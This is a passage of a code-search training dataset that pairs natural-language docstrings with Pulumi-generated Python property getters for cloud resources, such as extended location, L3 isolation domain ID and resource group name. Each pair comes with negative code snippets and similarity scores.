"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n address_family: Optional[pulumi.Input[str]] = None,\n allocation_default_netmask_length: Optional[pulumi.Input[int]] = None,\n allocation_max_netmask_length: Optional[pulumi.Input[int]] = None,\n allocation_min_netmask_length: Optional[pulumi.Input[int]] = None,\n allocation_resource_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n auto_import: Optional[pulumi.Input[bool]] = None,\n aws_service: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n ipam_scope_id: Optional[pulumi.Input[str]] = None,\n locale: Optional[pulumi.Input[str]] = None,\n public_ip_source: Optional[pulumi.Input[str]] = None,\n publicly_advertisable: Optional[pulumi.Input[bool]] = None,\n source_ipam_pool_id: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n __props__=None):\n ..."
] | [
"0.6447655",
"0.6238602",
"0.60722184",
"0.5890332",
"0.57577604",
"0.5746685",
"0.57304883",
"0.5688393",
"0.56835395",
"0.56028044",
"0.5589953",
"0.5589953",
"0.5589953",
"0.5589815",
"0.5561867",
"0.55557245",
"0.55503047",
"0.5528516",
"0.551963",
"0.55083257",
"0.5507104",
"0.5484785",
"0.54815567",
"0.54731333",
"0.5456437",
"0.5444488",
"0.5441277",
"0.54037106",
"0.53976536",
"0.53840363",
"0.5377784",
"0.5371969",
"0.53714365",
"0.5367424",
"0.53659713",
"0.5361175",
"0.5359696",
"0.5357121",
"0.5349888",
"0.5327476",
"0.5315972",
"0.5301544",
"0.52971923",
"0.5295122",
"0.5291445",
"0.5283604",
"0.5268822",
"0.5264353",
"0.5261494",
"0.52581257",
"0.5254149",
"0.52529407",
"0.52456075",
"0.5243484",
"0.5241904",
"0.52398765",
"0.5236054",
"0.5234029",
"0.52217144",
"0.5213666",
"0.5208834",
"0.5207189",
"0.519613",
"0.51942956",
"0.519308",
"0.5188177",
"0.51857114",
"0.5183726",
"0.51804394",
"0.5180082",
"0.5174037",
"0.51720375",
"0.51677716",
"0.5162175",
"0.51579833",
"0.5157657",
"0.5155775",
"0.5151071",
"0.5149276",
"0.5147294",
"0.5135359",
"0.5134204",
"0.5133753",
"0.5133389",
"0.51278996",
"0.5126143",
"0.51225",
"0.5119645",
"0.5118728",
"0.5116901",
"0.5111602",
"0.5109751",
"0.5109123",
"0.51079476",
"0.51078546",
"0.5103655",
"0.510052",
"0.5097831",
"0.5097769",
"0.5095034",
"0.5094984"
] | 0.0 | -1 |
The extended location of the cluster associated with the resource. | def extended_location(self) -> pulumi.Input['ExtendedLocationArgs']:
return pulumi.get(self, "extended_location") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def extended_location(self) -> pulumi.Output['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> pulumi.Output['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> pulumi.Output[Optional['outputs.ExtendedLocationResponse']]:\n return pulumi.get(self, \"extended_location\")",
"def set_up_extended_location(self, mc: ManagedCluster) -> ManagedCluster:\n self._ensure_mc(mc)\n\n edge_zone = self.context.get_edge_zone()\n if edge_zone:\n mc.extended_location = self.models.ExtendedLocation(\n name=edge_zone,\n type=self.models.ExtendedLocationTypes.EDGE_ZONE\n )\n return mc",
"def extended_location(self) -> Optional[pulumi.Input['ExtendedLocationArgs']]:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def location(self) -> str:\n return self.metadata.location",
"def resource_type(self):\n return 'cluster'",
"def cluster(self):\n return self._cluster",
"def cluster(self):\n return self._cluster",
"def location(self):\n self.manager.refresh_client()\n return self.content[\"location\"]",
"def _course_location(self):\r\n return \"location:{org}+{number}+{run}+course+{run}\".format(**self._course_dict)",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def cluster_name(self):\n return self.name",
"def location(self):\r\n return self._get('location', {})",
"def location(self):\n return self.properties.get(\"location\", Location())",
"def location(self) -> str:\n return self._location",
"def location(self) -> str:\n\t\tind = self._raw_result['locationIndex']\n\t\tif ind > -1 and ind < len(self._client.locations):\n\t\t\treturn self._client.locations[ind]['name']\n\t\treturn \"\"",
"def get_default_alt_loc(self):\n return self.default_alt_loc",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def default_secondary_location(self) -> str:\n return pulumi.get(self, \"default_secondary_location\")",
"def location(self):\n return self._location",
"def location(self):\n return self._location",
"def location(self) -> object:\n return self._location",
"def cluster_name(self):\n return self._data['cluster_name']",
"def Lokation(self):\n return self.getMylocation()",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def _cluster_scoped_iam_path(self):\n return f\"{IAM_ROLE_PATH}{self.stack_name}/\"",
"def location(self) -> Object:\n return self._location",
"def get_cluster_entry(self):\n\n cert_data = self.cluster_description.get(\"certificateAuthority\", {}).get(\"data\", \"\")\n endpoint = self.cluster_description.get(\"endpoint\")\n arn = self.cluster_description.get(\"arn\")\n\n return OrderedDict([\n (\"cluster\", OrderedDict([\n (\"certificate-authority-data\", cert_data),\n (\"server\", endpoint)\n ])),\n (\"name\", arn)\n ])",
"def get_location(self):\r\n return self.__location",
"def cal_location(self):\n return self.setup_location.name",
"def cluster_description(self):\n if self._cluster_description is None:\n if self._parsed_globals is None:\n client = self._session.create_client(\"eks\")\n else:\n client = self._session.create_client(\n \"eks\",\n region_name=self._parsed_globals.region,\n endpoint_url=self._parsed_globals.endpoint_url,\n verify=self._parsed_globals.verify_ssl\n )\n full_description = client.describe_cluster(name=self._cluster_name)\n self._cluster_description = full_description[\"cluster\"]\n\n if \"status\" not in self._cluster_description:\n raise EKSClusterError(\"Cluster not found\")\n if self._cluster_description[\"status\"] not in [\"ACTIVE\", \"UPDATING\"]:\n raise EKSClusterError(\"Cluster status is {0}\".format(\n self._cluster_description[\"status\"]\n ))\n\n return self._cluster_description",
"def get_location(self):\n\t\treturn self.location",
"def __str__(self):\n return \"Cluster\"",
"def get_location(self):\r\n return None",
"def locate(self):\n return utils.get_object(\"crds\", self.observatory, \"locate\")",
"def get_location(self):\n return self._overridden_location or self.get_default_location()",
"def get_location(self):\n return self.location",
"def locations(self):\r\n return resource.Location(self)",
"def location(self) -> Optional[str]:\n raise NotImplementedError()",
"def cluster_id(self):\n return self._cluster_id",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def get_cluster_info(self) -> Dict[str, Any]:\n pass",
"def location(self):\r\n\r\n raise SemanticError(\"Location not implemented\");",
"def cal_location(self):\n return self.location.name",
"async def location(self):\n if not hasattr(self, \"_location\"):\n self._location = await Stack.fetch_stack_value(self, \"http://usefulinc.com/ns/doap#location\", await self.uuid)\n return self._location",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self):\r\n try:\r\n return self.data['location']\r\n except KeyError:\r\n return self.data['station_name']",
"def get_cluster_name(cls):\n\n mid = Machineid()\n if mid.is_sps_cluster:\n return cls.SPS\n if mid.is_spts_cluster:\n return cls.SPTS\n if mid.is_mdfl_cluster:\n return cls.MDFL\n\n return cls.LOCAL",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def management_cluster(self) -> pulumi.Output['outputs.PrivateCloudManagementCluster']:\n return pulumi.get(self, \"management_cluster\")",
"def location(self):\n if self.scoping:\n return self.scoping.location\n else:\n return None",
"def getLocation(self):\n return self._Location",
"def location_arn(self) -> Optional[str]:\n return pulumi.get(self, \"location_arn\")",
"def get_location(self):\n return self.request({\n \"path\": \"/\" + UUID + \"/location\"\n })",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")"
] | [
"0.67308724",
"0.67308724",
"0.6552111",
"0.6427688",
"0.64267975",
"0.64260936",
"0.64260936",
"0.63151413",
"0.6296761",
"0.6123441",
"0.6123441",
"0.595561",
"0.58933264",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5868833",
"0.5868833",
"0.5868833",
"0.5862934",
"0.5843456",
"0.5832257",
"0.5774442",
"0.5670738",
"0.565388",
"0.5642064",
"0.5642064",
"0.5637912",
"0.5634472",
"0.5634472",
"0.5632768",
"0.56296843",
"0.56284314",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5592737",
"0.5577344",
"0.5573659",
"0.55710924",
"0.5565424",
"0.55634725",
"0.5558331",
"0.55544007",
"0.55512756",
"0.55403364",
"0.5537851",
"0.55323946",
"0.5517471",
"0.55100954",
"0.5498214",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54803187",
"0.5467255",
"0.5461056",
"0.5451514",
"0.5442272",
"0.5442272",
"0.5442272",
"0.5434703",
"0.54240304",
"0.541763",
"0.53864765",
"0.5384029",
"0.53797865",
"0.53771985",
"0.5368183",
"0.5366416",
"0.5366416",
"0.5366416"
] | 0.6507004 | 3 |
The resource ID of the Network Fabric l3IsolationDomain. | def l3_isolation_domain_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "l3_isolation_domain_id") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def l3_isolation_domain_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def external_network_id(self) -> str:\n return pulumi.get(self, \"external_network_id\")",
"def id(self):\n return self._domain.id",
"def domain_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"domain_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def dns_zone_resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"dns_zone_resource_id\")",
"def domain_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain_id\")",
"def domain_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_pool_id(self) -> str:\n return pulumi.get(self, \"resource_pool_id\")",
"def failover_group_id(self) -> str:\n return pulumi.get(self, \"failover_group_id\")",
"def resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_id\")",
"def custom_compliance_domain_id(self):\n return self._custom_compliance_domain_id",
"def unique_id(self):\n return self._light.address",
"def get_keystone_v3_domain_id(self, domain_name):\n LOG_OBJ.debug(\"Get the domain ID.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains?name=\" + \\\n str(domain_name)\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting the \"\n \"ID of domain\")\n print (\"No response from Server while getting the \"\n \"ID of domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get domain ID Failed with status %s and error \"\n \": %s\" % (response.status, response.data))\n print (\"Get domain ID Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Domain details : %s \" % output)\n if len(output['domains']) != 1:\n LOG_OBJ.debug(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n print(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n return\n\n return output['domains'][0]['id']",
"def resource_group_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def vulnerability_resilience_id():\n\n if S3VulnerabilityModel.resilience_pid is None:\n # Get the parameter_id of the aggregated_indicator\n db = current.db\n table = db.vulnerability_aggregated_indicator\n row = db(table.uuid == \"Resilience\").select(table.parameter_id,\n limitby=(0, 1)).first()\n try:\n S3VulnerabilityModel.resilience_pid = row.parameter_id\n except:\n # DB not initialised\n pass\n\n return S3VulnerabilityModel.resilience_pid",
"def external_id(self) -> str:\n return self._search_in_properties(ATTR_GUID)",
"def managed_rule_identifier(self) -> str:\n return pulumi.get(self, \"managed_rule_identifier\")",
"def managed_rule_identifier(self) -> str:\n return pulumi.get(self, \"managed_rule_identifier\")",
"def resource_group_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def external_id(self):\n return self._external_id",
"def external_id(self):\n return self._external_id",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def unique_id(self):\n return self.config_entry.entry_id + \"lsa\"",
"def hydrofabric_data_id(self) -> str:\n return self._hydrofabric_data_id",
"def unique_identifier(self) -> str:\n return pulumi.get(self, \"unique_identifier\")",
"def unique_id(self):\n return f\"c{self._zone.controller_index + 1}_z{self._zone.zone_index + 1}\"",
"def unique_id(self):\n return f\"bhyve:program:{self._program_id}\"",
"def internal_id(self) -> str:\n return pulumi.get(self, \"internal_id\")",
"def security_group_id_for_domain_boundary(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"security_group_id_for_domain_boundary\")",
"def storage_account_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"storage_account_resource_id\")",
"def id(self):\n return self.raw_resource.uuid",
"def establish_id(self):\n if self.config.node_id is None:\n self.config.node_id = str(uuid4()).replace('-', '')\n return self.config.node_id",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def unique_id(self):\n return self.config_entry.entry_id + \"nls\"",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def network_fabric_controller_id(self) -> str:\n return pulumi.get(self, \"network_fabric_controller_id\")",
"def resourceid(self):",
"def sql_virtual_machine_group_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"sql_virtual_machine_group_resource_id\")",
"def parent_cluster_resource_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"parent_cluster_resource_id\")",
"def storage_resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"storage_resource_id\")",
"def getMcc3Id(self):\n return self._base.getMcc3Id()",
"def id(self): \n if self.cloudnet:\n return self.cloudnet.id\n else:\n return None",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def namespace_id(self) -> str:\n return pulumi.get(self, \"namespace_id\")",
"def database_id(self) -> str:\n return pulumi.get(self, \"database_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def slb_id(self) -> str:\n return pulumi.get(self, \"slb_id\")",
"def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")",
"def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")",
"def cal_guid(self):\n return 'setup' + str(self.id) + '@lnldb'",
"def id(self) -> str:\n\n return self._inst.query('*IDN?')",
"def unique_id(self) -> str:\n return pulumi.get(self, \"unique_id\")",
"def get_id(self):\n if not self.nccl_id:\n logger.warning(\"The NCCL ID has not been \"\n \"set yet for store {}.\".format(self.name))\n return self.nccl_id"
] | [
"0.82438326",
"0.639748",
"0.639748",
"0.639748",
"0.6284943",
"0.6265004",
"0.62123185",
"0.617114",
"0.617114",
"0.617114",
"0.617114",
"0.617114",
"0.6158674",
"0.60937095",
"0.60937095",
"0.6091811",
"0.6091811",
"0.6091811",
"0.60563904",
"0.60457486",
"0.5990473",
"0.5979375",
"0.59711367",
"0.5962884",
"0.5938235",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.5891642",
"0.58725715",
"0.5865841",
"0.5865841",
"0.58452266",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.57935536",
"0.57935536",
"0.5793322",
"0.5793322",
"0.5785437",
"0.5774641",
"0.5774483",
"0.57647943",
"0.5748912",
"0.57442796",
"0.5741626",
"0.5724627",
"0.5717584",
"0.5717369",
"0.5704724",
"0.5704724",
"0.5704724",
"0.57012415",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56872606",
"0.56858325",
"0.5676404",
"0.5668158",
"0.5667462",
"0.5666045",
"0.56643575",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.56503826",
"0.56264055",
"0.5621662",
"0.5621662",
"0.5621662",
"0.5621662",
"0.5621106",
"0.5614265",
"0.5614265",
"0.56135184",
"0.56134295",
"0.5609916",
"0.56079584"
] | 0.8125011 | 1 |
The name of the resource group. The name is case insensitive. | def resource_group_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "resource_group_name") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def resource_group_name(self) -> str:\n return pulumi.get(self, \"resource_group_name\")",
"def group_name(self) -> str:\n return pulumi.get(self, \"group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def get_resource_group_name(self):\n return self.instance_metadata.resource_group_name",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def group_name(self):\n\n return self._group_name",
"def get_group_name(self):\n return self.groupname",
"def resource_group(self) -> str:\n return pulumi.get(self, \"resource_group\")",
"def get_resource_group_name(resource_id):\n match_groups = re.match(r\".*resourcegroups/(?P<group_name>[^/]*)/.*\", resource_id, flags=re.IGNORECASE)\n return match_groups.group(\"group_name\")",
"def name(self):\n return f\"{self._group.friendly_name} {GROUP_SUFFIX}\"",
"def get_resource_group_name(self) -> str:\n # read the original value passed by the command\n resource_group_name = self.raw_param.get(\"resource_group_name\")\n\n # this parameter does not need dynamic completion\n # this parameter does not need validation\n return resource_group_name",
"def getName(self):\n return _libsbml.Group_getName(self)",
"def group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"group_name\")",
"def group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"group_name\")",
"def group_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"group_name\")",
"def resource_group(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group\")",
"def resource_group(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group\")",
"def getGroupName(Id):\r\n return \"Group name\"",
"def subnet_group_name(self) -> str:\n return pulumi.get(self, \"subnet_group_name\")",
"def group(self) -> str:\n return pulumi.get(self, \"group\")",
"def ad_group_name(self):\n\n return self._ad_group_name",
"def ad_group_name(self):\n\n return self._ad_group_name",
"def parameter_group_name(self) -> str:\n return pulumi.get(self, \"parameter_group_name\")",
"def server_group_name(self) -> str:\n return pulumi.get(self, \"server_group_name\")",
"def subnet_group_name(self) -> Optional[str]:\n return pulumi.get(self, \"subnet_group_name\")",
"def resource_group(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group\")",
"def log_group_name(self) -> str:\n return jsii.get(self, \"logGroupName\")",
"def log_group_name(self) -> str:\n return jsii.get(self, \"logGroupName\")",
"def group(self) -> Optional[str]:\n return pulumi.get(self, \"group\")",
"def subnet_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"subnet_group_name\")",
"def _group_name(cls, group=None):\n suffix = f\"{cls.__module__}.{cls.__qualname__}\"\n if group is not None:\n suffix += \"-\" + group\n\n # Wrap the suffix into SHA256 to guarantee that the length of\n # the group name is limited. Otherwise Channels will complain\n # about that the group name is wrong (actually is too long).\n suffix_sha256 = hashlib.sha256()\n suffix_sha256.update(suffix.encode(\"utf-8\"))\n\n return f\"{GraphqlWsConsumer.group_name_prefix}-{suffix_sha256.hexdigest()}\"",
